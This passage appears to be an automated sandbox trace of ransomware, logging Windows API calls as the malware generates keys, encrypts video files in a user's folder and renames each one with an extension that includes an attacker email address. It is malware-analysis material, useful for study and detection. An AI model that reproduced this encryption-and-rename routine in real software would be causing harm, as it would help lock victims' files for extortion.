HALPmcxz\\Videos\\16vBBvZfKc2.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.566] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=48040) returned 1 [0121.566] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xbba8 [0121.566] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.566] GetProcessHeap () returned 0x410000 [0121.566] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.566] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.566] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.567] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.568] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.569] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xbba8) returned 0x4dcb68 [0121.569] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xbba8) returned 0xf50048 [0121.570] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.570] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0xbba8, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0xbba8, lpOverlapped=0x0) returned 1 [0121.572] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xbba8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.572] CloseHandle (hObject=0x4c8) returned 1 [0121.573] GetProcessHeap () returned 0x410000 [0121.573] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.573] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\16vBBvZfKc2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\16vbbvzfkc2.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\16vBBvZfKc2.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\16vbbvzfkc2.avi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.575] GetProcessHeap () returned 0x410000 [0121.575] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.575] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x163bd1e0, ftCreationTime.dwHighDateTime=0x1d5d7b1, ftLastAccessTime.dwLowDateTime=0x9fffb790, ftLastAccessTime.dwHighDateTime=0x1d5d8f9, ftLastWriteTime.dwLowDateTime=0x9fffb790, ftLastWriteTime.dwHighDateTime=0x1d5d8f9, nFileSizeHigh=0x0, nFileSizeLow=0x4242, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7UJNmNt7wl5RcDUl.swf", cAlternateFileName="7UJNMN~1.SWF")) returned 1 [0121.575] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7UJNmNt7wl5RcDUl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7ujnmnt7wl5rcdul.swf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.575] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.576] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4242, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.576] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.576] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.576] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.576] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.577] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.577] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.577] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7UJNmNt7wl5RcDUl.swf", dwFileAttributes=0x80) returned 1 [0121.577] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7UJNmNt7wl5RcDUl.swf") returned 58 [0121.577] GetProcessHeap () returned 0x410000 [0121.577] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x467908 [0121.577] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7UJNmNt7wl5RcDUl.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7UJNmNt7wl5RcDUl.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7UJNmNt7wl5RcDUl.swf" [0121.577] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7UJNmNt7wl5RcDUl.swf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7UJNmNt7wl5RcDUl.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7UJNmNt7wl5RcDUl.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.577] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=16962) returned 1 [0121.577] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x4242 [0121.577] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.577] GetProcessHeap () returned 0x410000 [0121.577] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.577] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.580] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.581] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.582] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.583] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4242) returned 0x4dcb68 [0121.583] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4242) returned 0x4e0db8 [0121.583] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.583] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x4242, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x4242, lpOverlapped=0x0) returned 1 [0121.585] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4242, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.585] CloseHandle (hObject=0x4c8) returned 1 [0121.586] GetProcessHeap () returned 0x410000 [0121.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.586] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7UJNmNt7wl5RcDUl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7ujnmnt7wl5rcdul.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7UJNmNt7wl5RcDUl.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7ujnmnt7wl5rcdul.swf.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.588] GetProcessHeap () returned 0x410000 [0121.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0121.588] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906e5740, ftCreationTime.dwHighDateTime=0x1d5de09, ftLastAccessTime.dwLowDateTime=0x86134420, ftLastAccessTime.dwHighDateTime=0x1d5e13a, ftLastWriteTime.dwLowDateTime=0x86134420, ftLastWriteTime.dwHighDateTime=0x1d5e13a, nFileSizeHigh=0x0, nFileSizeLow=0xb5a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7ZSmf fw.mp4", cAlternateFileName="7ZSMFF~1.MP4")) returned 1 [0121.588] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ZSmf fw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7zsmf fw.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.588] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.589] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xb5a1, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.589] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.589] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.589] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.589] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.590] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.590] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.590] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ZSmf fw.mp4", dwFileAttributes=0x80) returned 1 [0121.590] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ZSmf fw.mp4") returned 50 [0121.590] GetProcessHeap () returned 0x410000 [0121.590] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4) returned 0x44faf8 [0121.590] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ZSmf fw.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ZSmf fw.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ZSmf fw.mp4" [0121.590] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ZSmf fw.mp4", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ZSmf fw.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ZSmf fw.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.590] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=46497) returned 1 [0121.590] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xb5a1 [0121.590] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.590] GetProcessHeap () returned 0x410000 [0121.590] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.590] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.591] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.592] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.593] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.594] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb5a1) returned 0x4dcb68 [0121.594] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb5a1) returned 0xf50048 [0121.595] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.595] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0xb5a1, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0xb5a1, lpOverlapped=0x0) returned 1 [0121.597] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xb5a1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.597] CloseHandle (hObject=0x4c8) returned 1 [0121.598] GetProcessHeap () returned 0x410000 [0121.598] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.598] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ZSmf fw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7zsmf fw.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7ZSmf fw.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7zsmf fw.mp4.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.600] GetProcessHeap () returned 0x410000 [0121.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.600] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6737060, ftCreationTime.dwHighDateTime=0x1d5dc2f, ftLastAccessTime.dwLowDateTime=0xaaafb8f0, ftLastAccessTime.dwHighDateTime=0x1d5dfc2, ftLastWriteTime.dwLowDateTime=0xaaafb8f0, ftLastWriteTime.dwHighDateTime=0x1d5dfc2, nFileSizeHigh=0x0, nFileSizeLow=0xf8f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="97jnYABJz1hzF.flv", cAlternateFileName="97JNYA~1.FLV")) returned 1 [0121.600] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\97jnYABJz1hzF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\97jnyabjz1hzf.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.600] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.600] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf8f3, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.600] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.600] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.601] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.601] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.601] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.601] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.601] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\97jnYABJz1hzF.flv", dwFileAttributes=0x80) returned 1 [0121.601] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\97jnYABJz1hzF.flv") returned 55 [0121.601] GetProcessHeap () returned 0x410000 [0121.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x44faf8 [0121.601] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\97jnYABJz1hzF.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\97jnYABJz1hzF.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\97jnYABJz1hzF.flv" [0121.602] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\97jnYABJz1hzF.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\97jnYABJz1hzF.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\97jnYABJz1hzF.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.602] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=63731) returned 1 [0121.602] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xf8f3 [0121.602] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.602] GetProcessHeap () returned 0x410000 [0121.602] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.602] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.603] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.605] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.606] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf8f3) returned 0xf50048 [0121.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf8f3) returned 0xf5f948 [0121.608] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.608] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0xf8f3, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0xf8f3, lpOverlapped=0x0) returned 1 [0121.611] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf8f3, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.611] CloseHandle (hObject=0x4c8) returned 1 [0121.611] GetProcessHeap () returned 0x410000 [0121.611] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.612] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\97jnYABJz1hzF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\97jnyabjz1hzf.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\97jnYABJz1hzF.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\97jnyabjz1hzf.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.614] GetProcessHeap () returned 0x410000 [0121.614] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.614] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd15c80, ftCreationTime.dwHighDateTime=0x1d5e43b, ftLastAccessTime.dwLowDateTime=0xf781b250, ftLastAccessTime.dwHighDateTime=0x1d5d8b5, ftLastWriteTime.dwLowDateTime=0xf781b250, ftLastWriteTime.dwHighDateTime=0x1d5d8b5, nFileSizeHigh=0x0, nFileSizeLow=0x120e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BcD-2GJTf.avi", cAlternateFileName="BCD-2G~1.AVI")) returned 1 [0121.614] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BcD-2GJTf.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bcd-2gjtf.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.614] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.614] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x120e5, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.615] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.615] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.615] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.615] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.616] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.616] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.616] SetFileAttributesW 